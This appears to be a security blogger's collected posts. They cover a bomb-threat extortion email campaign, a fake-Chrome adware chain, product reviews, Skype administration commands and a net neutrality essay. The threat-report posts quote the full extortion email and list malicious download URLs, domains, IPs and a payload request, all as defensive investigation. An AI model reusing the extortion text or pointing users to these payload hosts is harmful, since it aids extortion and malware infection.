AlphaRacks Offline

AlphaRacks Offline

No Comments

We reported a massive phishing operation taking place back in July of 2018 at Alpharacks. The spam, child porn, malware, and phishing never stopped for a moment since writing about Alpharacks back in 2018. The [email protected] team never responded to any direct emails between Quadranet and myself. The blog is under development but at this time Alpharacks is still offline as of 5/26/19. Here is the most recent Statement from Alpharacks

See our article: Phishing – A Master Anglers Toolbox

Recent updates:

DeepSentinel

DeepSentinel

No Comments

DeepSentinel is a new home surveillance system that leverages cameras, AI, around-the-clock monitoring to prevent break-ins, auto theft, and other domestic crimes.

DeepSentinel cameras are equipped with speakers allowing two-way communication. Speakers at 104dB which is reportedly the loudest on the market. Each kit comes with 3 cameras, 1 hub, and mounting equipment. Cameras are battery operated and reportedly last up to 2 months without recharging.

If a crime is detected, the Surveillance Center will engage local law enforcement. DeepSentinel aims to identify a threat in under 10 seconds and contact the police within 20 seconds

 

 

System Review

Testing is in progress as are discussions with the vendor. This is a rough write up of the final testing that I am doing with this system at home. Please note despite any critical reviews of certain features I am certain of two things: 1. I am here to hang on because fully managed is what I need. 2. Apps, Features, Bugs, and Products can change with enough feedback. This is by no means a recommendation not to buy the system. I love it! My job (as always) is to show you how marketing meets the delivery. Also, highlight anything that needs development or may annoy a potential customer. I have been using it for approximately 1-month gathering this information.

Positive:

1. Wake up time is fast. Agents consistently verify events in a short amount of time. Tests were successful in bringing an agent to the live camera. Many other cameras I have tested seem to catch the movement 1-5 seconds after it starts. This unit always records the movement that is taking place reliably. Another feature I like is that the clips can be 1.5-2min long if necessary. Other devices have predefined lengths that cut off the activity prematurely.

2. Battery life is good/acceptable for cameras with 1-2 bars and heavy traffic in front of them. My cameras have been up for 1 month. Batteries are 61% (Front), 57% (Back Door), (Driveway) 27%. The extra battery is a nice touch. It took me a few to realize you can rip the top off of the hub to charge it.

3. The app is evolving with new features. Alerts have become more specific, and the privacy mode is much more flexible. Having an initial max of 3 hours was a mistake. 24hr is great, a schedule would be even better. One downside to privacy mode is it stops recording locally altogether. It would be nice to choose whether to keep storing footage locally on the box. The idea (in my mind) was to stop escalating it to the SOC.

 

Issues:

1. Picture Quality – Overall picture quality of snippets and recordings is low. The vendor stated this is to expedite uploading to the Operations Center. I find the quality locally on my end remains poor. It would be hard to identify a license plate or letters on a van for example. I don’t doubt that the camera is capable of more but I can see that it’s throttled down for the reason specified and perhaps others like preserving battery life, storage space, or other resources. My thought is that this might record full quality and then commit a lesser quality image to the Operations Center. There is a balance of evidentiary interest with these minor details in addition to the live response.

2. Opened a ticket with the Support Team to investigate an unexpected outage of my system in the first 14 days. I didn’t make any changes other than rebooting the system a few times. On my first escalation, the rep explained it away as one of those situations where a device crashes. I recommended avoiding that kind of rationalization in this instance. It’s much wiser to use support as a point to collect those technical details. I want to know if my box is going to crash every 14 days. Reboots don’t address root causes. The vendor has been responsive and contacted me about this multiple times. No crashes since that time.

3. The camera appears to inspect 100% of all movement. Dogs, a spider, people walking by 100 times in 5 minutes. I have not personally witnessed any kind of AI. Every time there is movement it’s verified by an agent. I’m trying to make the connection between AI Assisted and a fully managed service that manually checks 100% of all notifications. This is not evident in my usage of the product. I am waiting for the vendor to explain where the technology comes in to play. I need somebody to draw me that line… We all know of the  100s of vendors who sell AI but the execution seems to be largely reliant on humans. Maybe it’s in the roadmap? Learning mode?

^^ Turkey Burglar or Burger? I can’t decide. My Actual Intelligence determined this is a bird, not a threat.  We focus on what matters most  “Coupled with Artificial-Intelligence, we distinguish between a potential intruder and a car, dog (^turkey?) or other non-threats.“. I’m sure it’s in a hyper-excited type of ‘learning’ mode but I’m just saying… I don’t know or understand a lot about “How” it’s going to learn, and when to expect that to kick in. I don’t doubt it’s coming but I seek more information on what’s next for my system. For now, I don’t mind if they keep an eye on my turkeys.

4. Delayed alerts, false alarms with cameras going online/offline. Apps seem to be evolving with its notification styles on Android. I have seen alerts that there was activity at my Front Door but then the clip is for the Back Door. Other times it alerts but the clip is from a past time. Not clear if this is known but the app seems to be producing lots of alerts that apply to events which already happened. Or there’s no video waiting when I open the application to see that alert’s contents. It might be something that’s going on with my phone. It’s not annoying enough to cause any issues. I do have ComCrap internet service…

5. Adjusting the area of coverage in some cases took away from areas within that border. I am still experimenting but it seemed like the ideal way to keep it was expanding the coverage completely. I tried to reduce it in some areas to avoid a road with cars passing by in the distance. It has recently stopped firing on those cars so the AI may have learned this pattern. Previously I had dozens of recordings showing cars far in the distance moving laterally to my yard. (Vendor responded and made adjustments on 5/24)

6. Many situations where I select a camera and after 0-60 seconds it’s still loading. At this moment I have rebooted my phone + the hub several times and still can not load my cameras in a live view. It displays a message that it’s having trouble reaching cameras. I can’t do it at all no matter how many times I try with app version 345. The camera also hangs when it has a live alert and I click into it when an event is taking place. (Vendor replaced a defective camera on 5/28)

7. Wireless between the cameras and hub is just OK. It’s not terrible but it’s also not spectacular. There are no antennas on the hub and it’s a 2.4GHZ connection. I spoke with the company about this and they quickly sent me a few repeaters. Mind you my Wireless box has 4 antennas and 75% strength in the positions of the cameras. It’s not up to me though I have to use the Wireless built-in to the system unable to leverage my own. (Vendor provided WiFi extender on 5/29)

Unifi USG DDoS Amplification

Unifi USG DDoS Amplification

No Comments

We suspect a new  Ubiquiti  DDoS taking advantage of open UDP/10001 on the USG (Universal Security Gateway) Firewall. These packets are overloading devices with amplification packets going outbound from business and home user networks. The issue started yesterday Firewall has a large capacity that’s being completely utilized. Investigating further to confirm the attack reported by @ZDNET. Seeking more information on who’s building the tools, and the organizations who are being attacked

Blog is under development…

https://www.zdnet.com/article/over-485000-ubiquiti-devices-vulnerable-to-new-attack/

https://blog.rapid7.com/2019/02/01/ubiquiti-discovery-service-exposures/

Bomb Threat E-mails

Bomb Threat E-mails

No Comments

A developing story where a wave of e-mails around the United States has caused mass hysteria and evacuations. I’ve obtained two domains from a trusted source who manages hundreds of clients. Below I provide an example of the e-mail, and move on to start investigating the domains. As always I’m asking for others to independently look into these domains. I will be updating the blog as I obtain information about this issue.

Data for domains came from various sources but are relatively self-evident as the headers will match the From: address in this instance. I have a list of domains below with corresponding IP addresses that all point to the same provider’s network. In some cases, the key seems to be what the domain was doing before it moved over to the new Russian host. One approach is that I’ve found most of the were pointing to GoDaddy just prior to changing over to REG.RU. I couldn’t find many that had a frontpage or legitimate use. See below for a deep dive on 11 different domains/IPs sending these messages.

Example:

“Subject: Do not waste your time

Hello. My man hid an explosive device (Hexogen) in the building where your business is conducted. My mercenary assembled the explosive device according to my guide. It has small dimensions and it is covered up very carefully, it is impossible to damage the building structure by my bomb, but in the case of its detonation there will be many victims.

My recruited person keeps the area under the control. If any unusual behavioror cop is noticed he will power the bomb.

I can call off my man if you make a transfer. 20.000 dollars is the cost for your life and business. Pay it to me in BTC and I warrant that I will withdraw my man and the device won’t detonate. But do not try to cheat- my guarantee will become valid only after 3 confirmations in blockchain network.

My payment details (Bitcoin address): (REMOVED)

You must solve problems with the transaction by the end of the workday, if you are late with the money the device will detonate.

Nothing personal this is just a business, if you don’t transfer me the bitcoins and a bomb explodes, next time other companies will send me more money, because this is not a one-time action.

For my safety, I will no longer log into this email. I check my address every forty min and if I receive the payment I will order my person to get away.

If the explosive device detonates and the authorities see this letter:

We are not terrorists and dont assume any liability for explosions in other places.

Deeper Investigation

I’ve accumulated a total of 11 Domains/IPs that were actively sending as a part of this campaign. They all have working SPF records and are hosted in netblocks starting with 194.58.x.x in ORG-nrRL1-RIPE as the host out of Russia called REG.RU. I’m not saying Russia is behind it as that would be a very simple solution – and at this point we can’t attribute anything. I opened a ticket w/ the host Thu 12/13/2018 5:38 PM PST as the services were still up and running with no takedown requests, not surprisingly. They responded Fri 12/14/2018 4:31 AM PST that ‘Service is blocked’. Despite all of the media coverage, and expert analysis not one person contacted the source of the e-mails to prevent further activity. Infact, as you’ll see below this is the same host/subnet used on the most recent sextortion emails.

Note: The e-mail below is a Sextortion threat from back in late Oct of this year using the domain albionstudios_com. That domain still resolves to ISP where threats came from. This strongly implicates the same individuals have recently run sextortion spam jobs from the same source network.

Here is an example header from the bomb threats:

Network Map (2 of the 11 below)

VirusTotal Graph

Godaddy IPs that some of these domains had before the A records changed over to REG.RU based on passive DNS from DomainTools + VirusTotal records:

50.63.202.48
184.168.221.57
184.168.221.9
103.1.175.1
50.63.202.62
50.63.202.82
91.195.240.82
50.63.202.46

Domain #1: yinnyang.com (194.58.103.231) (Previously: 
50.63.202.46)

SPF record checks out for both hosts during the campaign:

Search shows that the IP for this domain was changed today after being stuck on another address for several years:

Current IP:

Current IP address search on VirusTotal shows a number of other domains associated with the IP

Looking at the previous IP address right before it switched:


Previous IP this domain was pointing to is regularly communicating Files on this address is off the charts. It’s obviously a Command & Control point for Malware communication. Probably a throwaway at GoDaddy that’s still being used. The key here is checking the other domains (many of which have no legitimate front page) for these kinds of connections as the largest majority suddenly made the DNS switch today for this campaign.

Malware Families associated with previous IP of the domain


Domain #2: armiracles.com (194.58.61.73)

Domain #3 – Tiedeman.com (194.58.58.207) (Previously 95.170.70.225)

Domain #4 – wedgeze.com (194.58.58.54)

Domain #5 – weimd.com (194.58.58.23

Domain #6 – whathappensatdeath.com (194.58.61.134

Domain #7 – vinight.com (194.58.58.82) (Previously: 
184.168.221.9)

Domain #8 – theweightlossarea.com (194.58.58.125)

Domain #9 – worldfused.com (194.58.61.67) (Previous: 50.63.202.62)

Domain #10 – tvlgbt.com (194.58.58.123)

Domain #11 – truockhichet.com (194.58.58.106)

Adware Empire – IronSource and InstallCore

Adware Empire – IronSource and InstallCore

A recent Adware campaign using malicious Bing ads led me to a Chrome download that eventually deployed Adware to the user’s computer. The IPs and types of Adware connected back to IronSource Ltd., Babylon Software Ltd., and InstallCore – all Israeli companies that have connections to Adware. See here, and here.

(Note: This was reported heavily by the media ZDNetOn MSFTInquirer, and Alphr in recent days. My discovery of the malicious ads was independent of any other source. My list of 3,500 IronSource Hostnames is exclusive, as is all of the IP research behind the Adware).

At this time, there appears to be a publisher that’s steering users to a network of sites that deliver a payload of Adware. Please note that I have made only tangential connections between said publisher and the aforementioned companies. Various IP addresses and analysis of the Adware point to IronSource as the controlling entity of the servers that the Adware is communicating with after it’s delivered. That’s not to say that IronSource is necessarily aware that a publisher (pay-per-install) is redirecting visitors to sites that impersonate Google Chrome.

The process began by searching Bing.com for “Download Chrome.” The ad at the top of the returned page below looks like a legitimate Chrome advertisement and has an “Ad” marker clearly visible, but it’s poisoned because it leads to a false Google Chrome domain.

Notice how the ad below says “Chrome is a fast,secure” browser. No, I didn’t make a typo – there is a missing space before the word “secure”!

 

The fake chrome website googleonline2018.com is presented to the user when they click the ad above.

 

 

Clicking ‘Download Chrome‘ leads the user to a URL:

files.drivedowns.com/direct/?cod=24620&name=GoogleChrome
🍪
302 Redirect
Which leads to another URL with the payload:
www.tasetofeni.com/y94jg5t/ChromeSetup.exe 
SHA1:a61c027efb9c0ea3448ef584302c987af508a07d8347c20e8f373d847034ba7c

^^ File above on VirusTotal (1/70) is only detected by BitDefender. Here’s the JoeSandBox Malware Analysis. Malware type delivered is DealAgent, which is considered as Adware.

We discovered a number of different Adware families being delivered from the hosts this file communicated with including Amonetize, BitVote Miner, Babylon Toolbar, InstallCore, Strictor, DealPly, InstallMiez (MacOS), OpenCandy, Optimizer Pro, SProtector, Crepreote, Advanced Mac Cleaner, Vittalia, OpinionSpy, Spynion, and Adware going by many other names across all of the IPs involved. There was also a prevalence of macOS unwanted programs and Adware communicating to these hosts, similar to a Command & Control infrastructure in malware. (JoeSandBox Malware Analysis)

A video below shows the full sequence of events:

A video below shows the full sequence of events:

We’ve compiled a video of the event and screenshots to walk through the process of encountering the Adware. In our video, the Antivirus Bitdefender blocks the attack, and it was the only one out of 70 other engines that detected it on VirusTotal. See JoeSandBox full analysis.

Deeper Investigation

***Update #1. Check out this list of 3,500 IronSource hostnames still active!

***Update #2. Related IP address in a block owned by IronSource199.58.87.151. It contains interesting files that appear to be payloads for the Adware applications. Curiously, a few are named KAVcompatibilityCheck.cis and Symantec_Norton_IronSourcev5.cis. Here’s a zip of the files I downloaded from the URLs in VirusTotal. Can you analyze these?

Below, I will investigate three domains. One belongs to the publisher, and the other two appear to funnel traffic using a referrer ID to a payload domain with round-robin DNS. Several of the IPs it resolves to belong to IronSource, based on WHOIS Records. Others are unidentified, but given the identical file structure and activity, I’d say there’s a great chance they’re all connected. As you scroll down, you’ll find a piece of evidence. I encourage you to continue researching them and connecting the dots. Let me know what you find…

Domain #1: googleonline.com

The landing page googleonline2018.com is a 116-day-old domain, registered by [email protected] at an IP address 149.28.73.46 that reportedly belongs to Vultr Holdings, LLC.

Example of the site googleonline2018.com:

A number of other domains are registered to this user with the word “Chrome” or “Google” in them.

There are two other domains that stand out like the atracksys.com (1st domain name on list above). They don’t seem to fit the profile of the fake Chrome sites. They are inccweb.com and necisoft.com, listed below from 3 to 4 years ago.

Information on registrar:

Blog @ 163.com no logins since 2007 – http://richard86811.blog.163.com/

Pastebin link https://pastebin.com/sai42Sdw has “456223”, “richard86811”, “868118918”, and “[email protected]”. These are held in a DB dump (of some kind) that reveals another email associated with the Gmail used to register these domains. The number 86 is the country code for China, and 86-811-8918 could potentially be a partial phone number.

Names associated with domains: Jiaqiang Li (Jiangmen & Guangdong, China) and Chen Weilong (Guangdong, China).

Domain #2: drivedowns.com

This domain is the initial redirector after you click Download Chrome. It’s a 20-day-old domain currently being protected by Cloudflare. It’s not uncommon to see malicious sites behind Cloudflare. I’ve made dozens of attempts to report abuse to this vendor, only to be rebuffed and told that “Our service is a pass-thru and we do not control the content of our customers.”

The VirusTotal results show not only that this domain is rated as malware by Fortinet, PREBYTES, and Scumware.org, but that others on the same IP appear to be backdoor PHP files and other malicious-looking, randomized-type domains. These details are unrelated to this campaign, but it goes to show you that it can both protect the good guys and obfuscate the real location of the bad guys.

Domain #3: tasetofeni.com

This domain is 101-days-old and has been using rotating Amazon IPs since at least 10/08/2018, based on passive DNS. This is not surprising, as we see plenty of hacked AWS accounts and/or fraudulent ones where attackers are controlling domains with no legitimate front page.

Other files with different packing are showing various levels of detection with AV Agents.

Malware ChromeSetup.exe is detected as InstallCore or a basic dropper/trojan.

Click for JoeSandBox Analysis of these files and domain goes into depth:

Domain #4: reholessbegise.com (dev, img, remote)

The ChromeSetup.exe dropped file communicates with a couple of subdomains on reholessbegise.com, a 35-day-old domain using AWS DNS. There is a connection with this domain and IPs owned by IronSource at LeaseWeb. Also, many of the IPs that resolve have the Babylon Toolbar, a piece of software made by Babylon Software Ltd. in Israel.

img.reholessbegise.com is a domain that many images are pulled from for the ChromeSetup.exe file and there’s no shortage of IPs behind it.

We resolved them with Whatsmydns globally to find a round-robin of addresses:

IPs: [199.58.87.155 (Active) 199.58.87.110 (Old), 199.58.87.151 (Old) ] (IronSource Israel via LeaseWeb)

Note how IronSource’s IP range has plenty of misleading or downright fake file names. These aren’t files that are ‘communicating’ but ones that have been pulled down from these hosts.

Check out this list of 3,500 IronSource Domains most are still active!

Note ‘InstallCore.com’ is hosted off of this IP owned by IronSource. Here’s a discussion between two hackers on a forum below about doing Adware installs for them linking the companies together. InstallCore is an ‘IronSource’ service.

LeaseWeb identifies the customer in WHOIS records:

 

dev.reholessbegise.com is a domain we can see ChromeSetup.exe talks to this domain often as confirmed in the sandbox analysis

Note that each IP has a Virustotal link to see it’s activity:

IP: [54.201.95.158, 35.167.192.77] –  (Amazon AWS)

IP: [185.59.222.146] (CDN77.com/Netherlands)

IP: [46.166.187.59] [85.159.237.103] (NForce Entertainment B.V.)

IP: [95.211.184.67] – (Leaseweb)

IPs: [146.185.27.45, 146.185.27.53, 209.95.37.242] (Midphase

IP: [192.96.201.161] (CommPeak.com via LeaseWeb)

The ChromeSetup.exe file talks heavily to these hosts and grabs not only images but suspicious files. See the JoeSandBox analysis for all communications.

Oct 26, 2018 6129 OUT HEAD /ofr/Solululadul/osutils.cis HTTP/1.1
Accept: */*
Host: remote.reholessbegise.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

(SHA256: 168656b0a807e5fa2c016d637c0c02d83753919ac5a8f493895e9dddce1a916c)

Still working on this investigation…. Have any tips? Drop me a line in my contact form.

Net Neutrality – The Spirit Lives On

Net Neutrality – The Spirit Lives On

No Comments

What if one day your Netflix suddenly stopped streaming and displayed an error message to call your Internet Service Provider for assistance? You place the call, and the provider advises that you’re currently not subscribed to the 3rd party streaming plan to access this type of content. Come to find out; the provider is now charging a fee for access to streaming content outside of its network. You’ll have to purchase a package to access Netflix or be forced to access the providers own video streaming service which comes at an additional cost. Net Neutrality rules are protections created in the spirit of a “need to ensure the openness of the Internet, preserving users’ free and nondiscriminatory access to content, applications or services available on the Internet.” (Bello & Jung, 2015).

The scenario with Netflix is but a glimpse into the reality of a world painted by those who oppose removing the protections. If a provider does make a user pay for specific services like gaming, video streaming, or establishing a remote connection to your office, it’s considered offering a “tiered service,” which differs from the unlimited subscription model of internet services today. Research suggests that repealing Net Neutrality regulations can be bad for consumers because they harm innovation and competition between providers, but also that repealing these laws allows for consumer internet traffic to be analyzed, manipulated to block content, and throttled to decrease the performance of the transmission speeds. The potential impacts to the consumer are interruptions to streaming, lower quality video, and possibly an inability to access certain types of services by requiring additional subscription fees, and some other scenarios that we’ve yet to imagine. ISPs may not be able to experiment with business models or innovate with new services in the market.

At the heart of the Net Neutrality debate is the concern that providers will be able to analyze, manipulate, throttle, or even block access to specific content on the internet. The term open internet comes to mind when thinking about the origins of the internet – an entity born free and not intended to be commercial in origin. The internet has evolved from a platform that was facilitating communication between universities, to the birth of e-commerce websites – and now services like cloud, the blockchain, or online distance learning leverage it to deliver content to every edge of the earth. It’s become a utility for all kinds of devices as well, for example, cars, refrigerators, water bottles, luggage, and even a surfboard. The possibilities are somewhat endless when you view things through the lens of the Open Internet versus the Restricted Internet. Consumers are increasingly adopting lifestyles that revolve around these services, which necessitates a discussion about the legal rights of ISPs to control information.

It’s entirely possible that ISPs will make changes that are “self-serving, and profit-maximizing goals when enhancing or degrading content carriage.” (Frieden, 2018). The service you have doesn’t currently come with the ‘package’ you have for internet access to these types of applications. What about employees who telecommute using a VPN connection to the office? Would ISPs be able to charge a premium for this kind of access, knowing that it’s for a commercial purpose? The short answer is yes; they’re able to categorize and sell products in any way that they’d like. It’s believed that “The Internet’s openness” should be understood as a guiding principle that transcends each of the layers/tiers and extends throughout the digital ecosystem, and that each of the stakeholders of this ecosystem is essential to its development. (CIGI, 2015).”. Keeping the spirit of the internet as an open place by integrating protections for consumers is essential to the discussion, and actions by the FCC. It’s proponents want to see these core values preserved and more transparency with how providers manage network traffic.

You might be asking yourself, is all of this for nothing? What is the real threat here, and are ISPs planning, or doing this kind of thing today? After all, if they have never done this before, then Net Neutrality could potentially be a solution in search of a problem. Is there any history, or even potential for abuse by these providers? The answer is yes, and one situation where a violation of Net Neutrality occurred when an organization called Public Knowledge complained to the FCC that the number two provider of internet Comcast was throttling BitTorrent Traffic. Comcast was working with a vendor who was Sandvine, a company that sells ‘Active Network Intelligence,’ a service which can give ISPs better visibility into exactly what kind of traffic is on the network. In a statement, the company explained that “Sandvine determined that the use of several Peer-to-Peer protocols was regularly generating disproportionate burdens on the network, primarily on the upstream portion of the network, causing congestion that was affecting other users on the network.” (Comcast, 2008). Based on this research, Comcast had reportedly achieved wide-scale deployment of a blocking platform in 2007 until the FCC ruled that the “The selective blocking of file-sharing traffic interfered with users’ rights to access the internet and to use applications of their choice.”. Although Comcast had a plausible explanation, it still violated the Net Neutrality rules because it interfered with the normal transmission of information. Comcast positioned itself to analyze, and interrupt certain types of legitimate communications without any transparency to its users. Notification of these practices had not been sent to its subscribers, effectively restricting any users of the BitTorrent file-sharing method that was used at one time by NASA to accelerate the distribution of satellite data. BitTorrent is not a completely illegitimate protocol, and even if it was the issue remains that customers were unaware of these activities. Based on this occurrence of the violation, it is entirely possible that ISPs could begin blocking traffic without the transparency provided by these regulations.

A key argument from opponents of repealing Net Neutrality rules is that it negatively impacts the innovation and competition between providers. The FCC commissioner stated that “…the regulations made things worse by limiting investment in high-speed networks and slowing broadband deployment. Under Title II, broadband network investment dropped more than 5.6% — the first time a decline has happened outside of a recession.” And went on to say that “Removing these outdated and unnecessary regulations will create a strong incentive for companies to pour resources into building better online infrastructure across the country and bringing faster, better, and cheaper Internet access to more Americans.” (FCC, 2018).

The stated intention of the government is that repealing these rules will aid in expansion in rural and hard-to-service areas, as well as higher average speeds throughout the US. They also wanted to allow ISPs to experiment with different business models, such as giving priority to medical applications, or self-driving cars. ISPs may experiment with security, home automation, and services like artificial intelligence that can help improve the quality of your experience in a meaningful way. There are limitless possibilities for how companies could innovate these products. Mainly, the concern is that small players in the market and start-ups wouldn’t be able to create unique services to compete with larger companies. In fact, the FCC found that “Title II regulations are bad for competition. They disproportionately burden the small Internet service providers and new entrants that are best positioned to introduce more competition into the broadband marketplace.” (FCC, 2017) And also that “Restoring Internet freedom will lead to greater investment in building and expanding broadband networks in rural and low-income areas as well as additional competition—leading to better, faster, cheaper Internet access for all Americans, including those on the wrong side of the digital divide.”. Based on these statements, it would appear that repealing could promote innovation among ISPs.

The Net Neutrality rules came under attack in January 2017, when president Donald Trump appointed Ajit Pai, an FCC commissioner who had previously voted against Title II reclassification of the internet, as the new head of the FCC. Net Neutrality was finally repealed on June 11th of 2018 and is no longer in effect after nearly 20 years of having classified internet services under the protection of telecommunication laws.

As of June 20th, 2018 thirty-six states have proposed or passed a resolution, bill, or executive order to preserve Net Neutrality since the new rules were adopted. Six states, Hawaii, Montana, New Jersey, New York, Rhode Island, and Vermont, have addressed this change by issuing Executive Orders requiring companies wishing to contract with the State to confirm that they will meet the 2017 net neutrality requirements. Thirty states have proposed legislation reinstating the net neutrality rules or requiring state contractors to abide by them. Ten additional states initiated Resolutions supporting Net Neutrality principles (NRRI, 2018)

Current day, there is a clause in which internet service providers or ISPs, have to disclose information about under circumstances they block or slow traffic and to disclose if and when they offer paid-priority services. The FCC has preserved the ‘transparency’ rules that had many concerned about the power over that ISPs could potentially hold over these communications. This development mitigates the risk that providers would continue to engage in activities such as blocking or throttling connections as Comcast did with BitTorrent, and not tell it’s customers. The current ruling is a win for consumers, who are only seeking a basic set of guidelines or principals to regulate the behavior of providers. It doesn’t have to be called Net Neutrality, but it does have to have increased transparency and still allow ISPs to grow and innovate in the markets in which they operate. We can’t let it be used in an anti-competitive, fraudulent, or discriminatorily to harm consumers in a way that diminishes the right to equal internet access abilities for all who seek it.

California net neutrality bill easily passes Assembly

Internet groups urge U.S. court to reinstate ‘net neutrality’ rules

Net Neutrality Repeal Enables Abuse By Carriers, Groups Tell Court

Ajit Pai killed net neutrality but still wants you to love the FCC

(Note: I’m actively updating this small paper I wrote for a class on Net Neutrality for a novice audience)

References:

Bello, P., & Jung, J. (2015). Net Neutrality: Reflections on the Current Debate. GLOBAL COMMISSION ON INTERNET GOVERNANCE

CIGI. (2015). Net Neutrality: Reflections on the Current Debate https://www.cigionline.org/sites/default/files/no13_web.pdf

Corporation Corporation. (2008, September). COMCAST CORPORATION DESCRIPTION OF CURRENT NETWORK MANAGEMENT PRACTICES. Retrieved from http://downloads.comcast.net/docs/Attachment_A_Current_Practices.pdf

FCC. (2018, May 22). Releases Restoring Internet Freedom Order. Retrieved from https://www.fcc.gov/document/fcc-releases-restoring-internet-freedom-order

FCC. (2017). Myth Vs. Fact. Retrieved from https://transition.fcc.gov/Daily_Releases/Daily_Business/2017/db1128/DOC-347961A1.pdf

Frieden, R. r. (2018). Freedom to Discriminate: Assessing the Lawfulness and Utility of Biased Broadband Networks. Vanderbilt Journal Of Entertainment & Technology Law, 20(3), 655-708.

NRRI. (2018). Net Neutrality State Actions Tracker. Retrieved from http://nrri.org/net-neutrality-tracker/

Skype – Why can’t it all be so simple

Skype – Why can’t it all be so simple

Skype now has four versions of its software – purely for your confusion and inconvenience. Most recently, Microsoft was on its way to canceling Skype v7.0, with a deadline of Sept 1st until an uproar from internet users not-so-quietly rolled that back. The new version of Skype that Microsoft is pushing now is called v8.0. There are issues users have brought up about its design and overall feel. One ‘idea’ on the Skype Voice site reads “Make Skype 8 look EXACTLY like Skype 7 Classic.” In its own forum, Microsoft stated that “Based on customer feedback, we are extending support for Skype 7 (Skype Classic) for some time. Our customers can continue to use Skype Classic until then. ”

Skype Release Notes is not being updated frequently by Microsoft. We’re seeing new versions, and 1 to 2 weeks later, there are still no details on what’s changed.

Skype FAQ and Known Issues has limited information on actual issues we’ve seen with the software. It would be nice to have a closed loop, with the Release Notes showing when things are fixed.

Here’s a quick rundown on versions of Skype:

Skype for Business – Used for SMB/Enterprises, typically via Office365, but can be hosted privately on Rackspace, etc.

Skype for Windows 10 v11 – Windows 10 app that runs off of the Microsoft Store. This version is part of a program called Universal Windows Platform, or UWP, which means it works identically across Windows 10 platforms like PC, tablet, phone, and holographic devices. At this time, it’s not clear if it is missing any features when compared to the new Skype Desktop, but it does seem to be a very basic touch-type app in Windows.

Skype Classic v7.0 – An apparent all-time favorite of Windows users, and they don’t want it to go away. It’s the “same old” same Skype and seems to be working perfectly. I’ve run into errors installing it on Windows 10 at times, which were probably due to a major update that MS still hadn’t put in their fixes to make it work.

Skype for Desktop v8.0 – Newest version of Skype that brings Free HD Video, @mentions, group calls with 24 users, and will soon have privacy features like off-the-record audio chats. The biggest value-add here is in those features, which are combined with a modern interface and, of course, the promise of future development.

There’s also: Skype for Web, Skype Meetings, Skype for Mac, Skype For Linux, Skype for Android, and Skype for iOS, if you feel like you don’t have enough Skype in your life.

Issues:

I’ll make a list of known issues and fixes as I test the software. Please see below for some of the common deployment and usage-type problems I’ve found in Skype, especially on the new v8.0.

  • Skype v8.0 – attempts to launch SkypeSetup.exe out of the user profile when the user has no admin permissions. The user can NOT open Skype – even when they hit No, the program keeps trying to trigger this download file. This happens every time Skype releases an update, and it will effectively lock the user out until the admin credentials are provided.

Adding these lines to the hosts file seemed to help block this version of Skype from trying to auto-upgrade:

127.0.0.1 get.skype.com
127.0.0.1 livegeteastus.cloudapp.net 
127.0.0.1 liveget.trafficmanager.net

Delete or block the SkypeSetup file:

del "%APPDATA%\Microsoft\Skype For Desktop\SkypeSetup.exe" /f
  • Skype v8.0 – does not remove Skype Classic from a machine when you push it out. In my testing, I was able to remove Skype v7 first and then push Skype v8. It migrated my profile to the new version. If I pushed Skype v8 on top of v7, it would launch both on start-up. Simply removing v7 didn’t fix it – I had to push v8 again after the removal. Here’s my recommendation:
wmic /node:'LOCALHOST' /interactive:off product where "name LIKE 'Skype% 7.%'" call uninstall

Skype-8.27.0.85.exe /silent
  • Skype for Business – Installs with the Business version of Office365 and will NOT let you remove it from the computer. Go ahead try it… use a customized install XML and it won’t honor the request to keep Lync off the machine. Even if it does remove Lync, the app will automatically reinstall during an online repair of Office.

Remove from start-up:

reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ /v Lync /f
  • Skype For Business– 2nd issue with Skype For Business is easily connecting to regular Skype users. Microsoft requires them to associate with a Live.com email before this can happen. You can’t find them, and they can’t find you until that has been done. In my testing, I could not add my personal Skype account to a test instance running for Business without the Microsoft email association.
  • Skype v11 for Windows 10 – This version of Skype can cause confusion and issues with compatibility when it comes to the new features offered by Skype Desktop v8.

Remove it using Powershell:

Set-ExecutionPolicy -Scope LocalMachine Restricted
Get-AppxPackage Microsoft.SkypeApp | Remove-AppxPackage

Panda Antivirus Adaptive Defense 360

Panda Antivirus Adaptive Defense 360

No Comments

We recently tested Panda Antivirus Adaptive Defense as a continuance to a previous review of NGAV products. Does Panda live up to its claims? Is it the future of Antivirus? It has it’s ups and downs but overall I think the issues we experienced can be fixed. It’s headed in the right direction and overall the interface is designed well for a modern protection platform.

Panda’s current version is 7. x and the product is Adaptive Defense 360. From the marketing on the website, you get the feeling that it’s not your average ‘Panda’ but it’s next-generation, sexy, and ready to eradicate even the most virulent samples.

During the test, I exchanged 178 emails with the vendor over a period of fewer than 90 days. I’ve learned a great deal through direct experience of its stability and effectiveness. It’s been my experience that you’d better test the heck out of these products. Not only with detection but the basic administration features as well. There can be bugs lurking that may not impact you on the security side but potentially impair your ability to control and manage endpoints. I went ahead and dug in using my basic Dell models and hoped for the best. Keep in mind that the things I don’t ‘like’ are bugs that can be resolved – not necessarily fatal issues. Here’s my evaluation…

*** Update 8/13 – Panda is aware of this blog and actively working to fix any of the issues I found. They’ve allocated folks from Product Management, Engineering and other teams to help improve response.

A few things to note:

1. My blog recommends products on occasion but has nothing for sale
2. Bugs like to come out when I’m around so careful if I sign up for a demo
3. I don’t drink the kool-aid so I look forward to lifting the marketing curtain

Machines Tested:

Dell Latitude E6440, E5470, E5480
Dell XPS 8390 (Desktop)
Dell Inspiron (7000 Series)
Windows 7 and Windows 10

Things we liked: 

  • Support is light speed and much more responsive than BitDefender. We received prompt responses and consistent service from all of the techs. They responded appropriately to our concerns. Many times it was just a matter of reproducing the issues and gathering the right data. Panda can trigger a ‘PSINFO’ tool to gather support data without you having to send any technical information to support. In comparison, I’ve waited days and days for BitDefender support to reply. Even when they do it’s not with any urgency. If you call there is typically no way to speak to anyone live at BitDefender until they call you back. Panda is easy to get on the phone and called me often when I was available before the afternoon time.
  • Panda recently implemented anti-tampering. I’ve been advocating for this across a number of products. In Barkly, I could simply stop any of the AV processes, execute malcode and start them again. Panda protected its services even in the services.msc snap-in.
  • EDR function traced the source of execution back to a file on many virus samples we tested. We’d get an alert within 0-15 minutes that showed which process executed a particular piece of code and where it connected to. Very useful and is focused on the context of that execution. Liked this better than the fancy tree in other EDR products. It’s better to be able to alert on this in an e-mail format without needing to access the console.
